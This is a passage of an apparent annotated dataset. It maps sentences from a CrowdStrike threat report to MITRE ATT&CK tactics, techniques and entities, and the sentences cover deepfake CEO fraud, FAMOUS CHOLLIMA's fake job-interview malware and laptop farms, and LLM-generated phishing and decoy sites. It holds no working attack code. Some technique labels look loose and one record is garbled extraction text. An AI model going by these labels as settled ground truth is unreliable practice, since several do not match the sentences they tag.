FAMOUS CHOLLIMA candidates provide answers likely derived from external sources.", "sentence_text": "LLMs likely support these interviews by rapidly generating plausible responses.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s158-5586ed", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 158, "context_before": "LLMs likely support these interviews by rapidly generating plausible responses.", "sentence_text": "GenAI is also used for BEC and fraud.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s159-eb5cb6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 159, "context_before": "GenAI is also used for BEC and fraud.", "sentence_text": "In February 2024, unidentified threat actor(s) used public footage of a target company’s chief financial officer and other employees to create credible deepfake video clones and socially engineer the victim into transferring 25.6 million USD to the threat actor(s).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1566.003", "name": "Spearphishing via Service" }, { "id": "T1656", "name": "Impersonation" } ], "procedure": "Threat actors use deepfake video clones of executives to socially engineer a victim into transferring 25.6 million USD.", "entities": [ { "text": "threat actor(s)", "start": 31, "end": 46, "label": "ThreatActor" }, { "text": "used public footage", "start": 47, "end": 66, "label": "Action" }, { "text": "create credible deepfake video clones", "start": 136, "end": 173, "label": "Action" }, { "text": "socially engineer the victim", "start": 178, "end": 206, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s160-0e052e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 160, "context_before": "In February 2024, unidentified threat actor(s) used public footage of a target company’s chief financial officer and other employees to create credible deepfake video clones and socially engineer the victim into transferring 25.6 million USD to the threat actor(s).", "sentence_text": "In May 2024, industry reporting indicated threat actors had impersonated the CEO of an international professional services entity and attempted to solicit fraudulent payments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1656", "name": "Impersonation" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "Threat actors impersonate a CEO of an international professional services entity to solicit fraudulent payments.", "entities": [ { "text": "threat actors", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "impersonated the CEO", "start": 60, "end": 80, "label": "Action" }, { "text": "solicit fraudulent payments", "start": 147, "end": 174, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s161-05bf87", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 161, "context_before": "In May 2024, industry reporting indicated threat actors had impersonated the CEO of an international professional services entity and attempted to solicit fraudulent payments.", "sentence_text": "The threat actor also appeared to have used genAI to clone the CEO’s voice and attempted to persuade the call recipient to transfer funds.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1656", "name": "Impersonation" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "The threat actor uses AI-generated voice cloning of a CEO to socially engineer a victim into transferring funds.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "used genAI to clone the CEO’s voice", "start": 39, "end": 74, "label": "Action" }, { "text": "persuade the call recipient to transfer funds", "start": 92, "end": 137, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s162-3caabb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 162, "context_before": "The threat actor also appeared to have used genAI to clone the CEO’s voice and attempted to persuade the call recipient to transfer funds.", "sentence_text": "The relationship between genAI and social engineering is also evidenced by the evolving focus of mobile malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s163-828423", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 163, "context_before": "The relationship between genAI and social engineering is also evidenced by the evolving focus of mobile malware.", "sentence_text": "Since late 2023, the GoldPickaxe malware has been employed to steal biometric facial data from iOS and Android devices throughout the Asia Pacific (APAC) region.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1111", "name": "Multi-Factor Authentication Interception" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "GoldPickaxe malware is used to steal biometric facial data from mobile devices across the APAC region.", "entities": [ { "text": "GoldPickaxe malware", "start": 21, "end": 40, "label": "MalwareTool" }, { "text": "employed to steal biometric facial data", "start": 50, "end": 89, "label": "Action" }, { "text": "biometric facial data", "start": 68, "end": 89, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s164-f979cd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 164, "context_before": "Since late 2023, the GoldPickaxe malware has been employed to steal biometric facial data from iOS and Android devices throughout the Asia Pacific (APAC) region.", "sentence_text": "Academic research further highlights the appeal of LLMs for social engineering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s165-0462a6", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 165, "context_before": "Academic research further highlights the appeal of LLMs for social engineering.", "sentence_text": "»A 2024 STUDY OF PHISHING EMAIL LLMs can generate phishing email content or credential harvesting websites CLICK-THROUGH RATES INDICATED at least as well as humans.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p20-s166-f358c8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 20, "sentence_id": 166, "context_before": "»A 2024 STUDY OF PHISHING EMAIL LLMs can generate phishing email content or credential harvesting websites CLICK-THROUGH RATES INDICATED at least as well as humans.", "sentence_text": "A 2024 study of phishing email click-through rates LLM-GENERATED PHISHING MESSAGES indicated LLM-generated phishing messages had a significantly higher HAD A SIGNIFICANTLY HIGHER click-through rate (54%) than likely human-written phishing messages (12%).1 CLICK-THROUGH RATE (54%) THAN LIKELY HUMAN-WRITTEN PHISHING A separate 2024 study found detection rates for LLM-generated phishing MESSAGES (12%).1 pages were comparable to those for human-created phishing pages.2 1 https://arxiv.org/pdf/2412.00586 2 https://arxiv.org/pdf/2310.19181v2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p21-s167-32b3b5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 21, "sentence_id": 167, "context_before": "A 2024 study of phishing email click-through rates LLM-GENERATED PHISHING MESSAGES indicated LLM-generated phishing messages had a significantly higher HAD A SIGNIFICANTLY HIGHER click-through rate (54%) than likely human-written phishing messages (12%).1 CLICK-THROUGH RATE (54%) THAN LIKELY HUMAN-WRITTEN PHISHING A separate 2024 study found detection rates for LLM-generated phishing MESSAGES (12%).1 pages were comparable to those for human-created phishing pages.2 1 https://arxiv.org/pdf/2412.00586 2 https://arxiv.org/pdf/2310.19181v2", "sentence_text": "The adversary regularly conducted financially motivated cyber operations across the globe, deploying their characteristic BeaverTail and InvisibleFerret malware families.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "The adversary conducts financially motivated cyber operations globally, deploying BeaverTail and InvisibleFerret malware families.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "conducted financially motivated cyber operations", "start": 24, "end": 72, "label": "Action" }, { "text": "deploying their characteristic BeaverTail and InvisibleFerret malware families", "start": 91, "end": 169, "label": "Action" }, { "text": "BeaverTail", "start": 122, "end": 132, "label": "MalwareTool" }, { "text": "InvisibleFerret", "start": 137, "end": 152, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p21-s168-2470fb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 21, "sentence_id": 168, "context_before": "The adversary regularly conducted financially motivated cyber operations across the globe, deploying their characteristic BeaverTail and InvisibleFerret malware families.", "sentence_text": "FAMOUS CHOLLIMA\nIN 2024\n300+INCIDENTS 40%INSIDER THREAT TOP TARGETED SECTORS TOP TARGETED COUNTRIES OTHER TECHNOLOGY EDUCATION OTHER UNITED STATES ENERGY BRAZIL CANADA MANUFACTURING GERMANY CONSULTING & JAPAN PROFESSIONAL SERVICES NETHERLANDS MEDIA RETAIL UNITED KINGDOM", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p21-s169-d41256", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 21, "sentence_id": 169, "context_before": "FAMOUS CHOLLIMA\nIN 2024\n300+INCIDENTS 40%INSIDER THREAT TOP TARGETED SECTORS TOP TARGETED COUNTRIES OTHER TECHNOLOGY EDUCATION OTHER UNITED STATES ENERGY BRAZIL CANADA MANUFACTURING GERMANY CONSULTING & JAPAN PROFESSIONAL SERVICES NETHERLANDS MEDIA RETAIL UNITED KINGDOM", "sentence_text": "HEALTHCARE INDIA FINANCIAL SERVICES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s170-505dc0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 170, "context_before": "HEALTHCARE INDIA FINANCIAL SERVICES", "sentence_text": "FAMOUS CHOLLIMA’s cyber operations remained remarkably consistent throughout 2024, relying on delivery of a first-stage implant via a trojanized Node.js application.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "FAMOUS CHOLLIMA delivers a first-stage implant via a trojanized Node.js application as part of its cyber operations.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "delivery of a first-stage implant", "start": 94, "end": 127, "label": "Action" }, { "text": "trojanized Node.js application", "start": 134, "end": 164, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s171-514087", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 171, "context_before": "FAMOUS CHOLLIMA’s cyber operations remained remarkably consistent throughout 2024, relying on delivery of a first-stage implant via a trojanized Node.js application.", "sentence_text": "FAMOUS CHOLLIMA: This application was disguised as a coding challenge for blockchain developers and delivered to victims under the guise of an employment interview.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "FAMOUS CHOLLIMA disguises a malicious application as a coding interview challenge and delivers it to victims under the guise of an employment interview.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "was disguised as a coding challenge for blockchain developers", "start": 34, "end": 95, "label": "Action" }, { "text": "delivered to victims under the guise of an employment interview", "start": 100, "end": 163, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s172-a12878", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 172, "context_before": "This application was disguised as a coding challenge for blockchain developers and delivered to victims under the guise of an employment interview.", "sentence_text": "FAMOUS CHOLLIMA deployed seven distinct malware families in 2024, evading detection by slightly refining how the files were downloaded and executed.\nFAMOUS CHOLLIMA’s malicious insiders appear to opportunistically pursue insider access across multiple sectors.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" }, { "id": "T1204", "name": "User Execution" }, { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "FAMOUS CHOLLIMA deploys multiple malware families and evades detection by modifying download and execution methods, while malicious insiders pursue access across sectors.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "deployed seven distinct malware families", "start": 16, "end": 56, "label": "Action" }, { "text": "evading detection", "start": 66, "end": 83, "label": "Action" }, { "text": "refining how the files were downloaded and executed", "start": 96, "end": 147, "label": "Action" }, { "text": "malicious insiders", "start": 167, "end": 185, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s173-e19eda", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 173, "context_before": "FAMOUS CHOLLIMA deployed seven distinct malware families in 2024, evading detection by slightly refining how the files were downloaded and executed.\nFAMOUS CHOLLIMA’s malicious insiders appear to opportunistically pursue insider access across multiple sectors.", "sentence_text": "The adversary’s activity is likely driven by available employment opportunities rather than specific targeting requirements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s174-43acd8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 174, "context_before": "The adversary’s activity is likely driven by available employment opportunities rather than specific targeting requirements.", "sentence_text": "Operatives use stolen or fraudulent identities to obtain software development jobs and then send their company-provided laptop to a third-party facilitator running a laptop farm.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1585", "name": "Establish Accounts" } ], "procedure": "Operatives use stolen or fraudulent identities to obtain software development jobs and send company-issued laptops to facilitators operating laptop farms.", "entities": [ { "text": "Operatives", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "use stolen or fraudulent identities", "start": 11, "end": 46, "label": "Action" }, { "text": "obtain software development jobs", "start": 50, "end": 82, "label": "Action" }, { "text": "send their company-provided laptop", "start": 92, "end": 126, "label": "Action" }, { "text": "third-party facilitator running a laptop farm", "start": 132, "end": 177, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s175-474e25", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 175, "context_before": "Operatives use stolen or fraudulent identities to obtain software development jobs and then send their company-provided laptop to a third-party facilitator running a laptop farm.", "sentence_text": "FAMOUS CHOLLIMA installs remote management tools and several browser extensions on the laptops.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" }, { "id": "T1112", "name": "Modify Registry" } ], "procedure": "FAMOUS CHOLLIMA installs remote management tools and browser extensions on compromised laptops to maintain access and control.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "installs remote management tools", "start": 16, "end": 48, "label": "Action" }, { "text": "several browser extensions", "start": 53, "end": 79, "label": "Action" }, { "text": "laptops", "start": 87, "end": 94, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s176-58dc0c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 176, "context_before": "FAMOUS CHOLLIMA installs remote management tools and several browser extensions on the laptops.", "sentence_text": "While CrowdStrike Intelligence has observed code or intellectual property exfiltration in some cases, most insider threats appear motivated by the job’s salary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s177-b44f42", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 177, "context_before": "While CrowdStrike Intelligence has observed code or intellectual property exfiltration in some cases, most insider threats appear motivated by the job’s salary.", "sentence_text": "FAMOUS CHOLLIMA was one of the most active adversaries in 2024, significantly surpassing other state-nexus adversaries’ operational tempos.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s178-993e6a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 178, "context_before": "FAMOUS CHOLLIMA was one of the most active adversaries in 2024, significantly surpassing other state-nexus adversaries’ operational tempos.", "sentence_text": "Notably, activity increased in the second half of 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s179-e380da", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 179, "context_before": "Notably, activity increased in the second half of 2024.", "sentence_text": "This adversary will very likely continue conducting parallel cyber and insider threat campaigns well into 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s180-24403a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 180, "context_before": "This adversary will very likely continue conducting parallel cyber and insider threat campaigns well into 2025.", "sentence_text": "This assessment is based on the adversary’s success, their ongoing high operational tempo, and the minimal impact of government indictments and actions against the adversary throughout 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s181-4de5b4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 181, "context_before": "This assessment is based on the adversary’s success, their ongoing high operational tempo, and the minimal impact of government indictments and actions against the adversary throughout 2024.", "sentence_text": "Information Operations\nAdversaries can easily employ genAI tools to conduct IO campaigns and primarily use them to create tailored content at scale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s182-340036", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 182, "context_before": "Information Operations\nAdversaries can easily employ genAI tools to conduct IO campaigns and primarily use them to create tailored content at scale.", "sentence_text": "Unlike other social engineering techniques, IO campaigns using AI-generated content are typically not checked for accuracy by most consumers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s183-c265c7", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 183, "context_before": "Unlike other social engineering techniques, IO campaigns using AI-generated content are typically not checked for accuracy by most consumers.", "sentence_text": "Adversaries may achieve their goals even if the target knows the content is fabricated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s184-a880bc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 184, "context_before": "Adversaries may achieve their goals even if the target knows the content is fabricated.", "sentence_text": "This network amplified politically divisive issues to exacerbate social divisions in the lead-up to the 2024 U.S. presidential election.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s185-29e1d5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 185, "context_before": "This network amplified politically divisive issues to exacerbate social divisions in the lead-up to the 2024 U.S. presidential election.", "sentence_text": "Industry sources have linked the operation to China-based entities using LLMs.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s186-cafcc1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 186, "context_before": "Industry sources have linked the operation to China-based entities using LLMs.", "sentence_text": "Russia-aligned operators also used genAI to spread disinformation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p22-s187-0fa5f8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 22, "sentence_id": 187, "context_before": "Russia-aligned operators also used genAI to spread disinformation.", "sentence_text": "In 2024, a propagandist likely used LLMs to generate tailored content and workflow automation tools that supported a vast IO campaign targeting U.S. audiences.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s188-4d9187", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 188, "context_before": "In 2024, a propagandist likely used LLMs to generate tailored content and workflow automation tools that supported a vast IO campaign targeting U.S. audiences.", "sentence_text": "Threat Actors Leverage GenAI to Support CNO", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s189-ead40d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 189, "context_before": "Threat Actors Leverage GenAI to Support CNO", "sentence_text": "Some adversaries are exploring the use of genAI to directly support CNO, likely using it to assist in writing utility scripts and developing tools or malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s190-44e4e9", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 190, "context_before": "Some adversaries are exploring the use of genAI to directly support CNO, likely using it to assist in writing utility scripts and developing tools or malware.", "sentence_text": "Limited direct visibility into adversary use of LLMs often inhibits analysis of these campaigns.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s191-e1af0c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 191, "context_before": "Limited direct visibility into adversary use of LLMs often inhibits analysis of these campaigns.", "sentence_text": "Nonetheless, many adversaries using LLMs are likely still familiarizing themselves with these tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s192-8fd4f3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 192, "context_before": "Nonetheless, many adversaries using LLMs are likely still familiarizing themselves with these tools.", "sentence_text": "In March 2024, a criminal actor distributed a spam email campaign that used a likely LLM-generated .txt template.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "A criminal actor distributes a spam email campaign using a likely LLM-generated template as part of phishing activity.", "entities": [ { "text": "criminal actor", "start": 17, "end": 31, "label": "ThreatActor" }, { "text": "distributed a spam email campaign", "start": 32, "end": 65, "label": "Action" }, { "text": "LLM-generated .txt template", "start": 85, "end": 112, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s193-8b9386", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 193, "context_before": "In March 2024, a criminal actor distributed a spam email campaign that used a likely LLM-generated .txt template.", "sentence_text": "criminal actor: The emails delivered an archive file containing the commodity malware Snake Keylogger.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "The criminal actor delivers an archive file containing Snake Keylogger malware via email as part of a spam campaign.", "entities": [ { "text": "criminal actor", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "delivered an archive file", "start": 27, "end": 52, "label": "Action" }, { "text": "Snake Keylogger", "start": 86, "end": 101, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s194-c53cdc", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 194, "context_before": "The emails delivered an archive file containing the commodity malware Snake Keylogger.", "sentence_text": "This campaign marks CrowdStrike’s first confirmed instance of a criminal actor using likely LLM-generated content in a malicious spam campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s195-b02388", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 195, "context_before": "This campaign marks CrowdStrike’s first confirmed instance of a criminal actor using likely LLM-generated content in a malicious spam campaign.", "sentence_text": "BGH ransomware operators APT INC used an uncommon, destructive PowerShell script to destroy data on a physical host.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" }, { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "BGH ransomware operators (APT INC) use a destructive PowerShell script to destroy data on a physical host.", "entities": [ { "text": "APT INC", "start": 25, "end": 32, "label": "ThreatActor" }, { "text": "used an uncommon, destructive PowerShell script", "start": 33, "end": 80, "label": "Action" }, { "text": "PowerShell script", "start": 63, "end": 80, "label": "MalwareTool" }, { "text": "destroy data on a physical host", "start": 84, "end": 115, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s196-87697c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 196, "context_before": "BGH ransomware operators APT INC used an uncommon, destructive PowerShell script to destroy data on a physical host.", "sentence_text": "Adversaries have used LLMs to generate scripts in the past; for example, SCATTERED SPIDER used a likely LLM-generated script in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s197-2b2869", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 197, "context_before": "Adversaries have used LLMs to generate scripts in the past; for example, SCATTERED SPIDER used a likely LLM-generated script in 2023.", "sentence_text": "eCrime actors have also employed genAI to produce content.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s198-2bd40a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 198, "context_before": "eCrime actors have also employed genAI to produce content.", "sentence_text": "The adversary lures prospective targets by purchasing advertisements for particular search terms via Google or Bing.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "The adversary purchases search advertisements to lure prospective targets via Google or Bing search terms.", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "lures prospective targets", "start": 14, "end": 39, "label": "Action" }, { "text": "purchasing advertisements for particular search terms via Google or Bing", "start": 43, "end": 115, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s199-9176ff", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 199, "context_before": "The adversary lures prospective targets by purchasing advertisements for particular search terms via Google or Bing.", "sentence_text": "They filter out requests not originating from a malicious advertisement to ensure only legitimate victims receive the malware; other requests are rerouted to decoy websites created with LLM-generated text and imagery.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" }, { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "The adversary filters traffic from malicious advertisements and redirects non-targeted requests to decoy websites generated with LLM-based content.", "entities": [ { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "filter out requests not originating from a malicious advertisement", "start": 5, "end": 71, "label": "Action" }, { "text": "rerouted to decoy websites", "start": 146, "end": 172, "label": "Action" }, { "text": "decoy websites", "start": 158, "end": 172, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s200-49af73", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 200, "context_before": "They filter out requests not originating from a malicious advertisement to ensure only legitimate victims receive the malware; other requests are rerouted to decoy websites created with LLM-generated text and imagery.", "sentence_text": "In another campaign, an eCrime actor used similar techniques while distributing tooling crypted with the Davey crypter to targets who searched for two-factor authentication (2FA) software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1204", "name": "User Execution" } ], "procedure": "An eCrime actor distributes crypted tooling using the Davey crypter to targets searching for 2FA software as part of a malicious campaign.", "entities": [ { "text": "eCrime actor", "start": 24, "end": 36, "label": "ThreatActor" }, { "text": "distributing tooling crypted with the Davey crypter", "start": 67, "end": 118, "label": "Action" }, { "text": "Davey crypter", "start": 105, "end": 118, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p23-s201-933021", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 23, "sentence_id": 201, "context_before": "In another campaign, an eCrime actor used similar techniques while distributing tooling crypted with the Davey crypter to targets who searched for two-factor authentication (2FA) software.", "sentence_text": "Clicking on the advertisement exposes the malicious download site, while direct accesses are forwarded to an LLM-generated decoy site.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1189", "name": 